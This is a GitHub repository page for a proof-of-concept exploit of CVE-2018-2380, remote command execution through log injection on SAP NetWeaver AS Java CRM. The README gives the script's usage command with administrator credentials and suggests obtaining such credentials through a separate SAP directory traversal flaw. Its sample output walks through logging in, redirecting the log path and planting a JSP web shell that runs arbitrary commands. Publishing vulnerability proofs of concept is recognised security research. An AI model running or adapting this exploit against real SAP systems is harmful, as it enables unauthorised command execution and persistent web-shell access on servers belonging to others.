Skip to content

erpscanteam/CVE-2018-2380

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-2380 (CVSS v3 Base Score: 6.6/10)

PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM Script usage example

python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

Where --host is a SAP server IP --port SAP NetWeaver AS Java port username and password of SAP administrator you can get using SAP Redwood directory traversal vulnerability.

example script usage output

C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380


[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!

C:\exploits\SAP>

About

PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages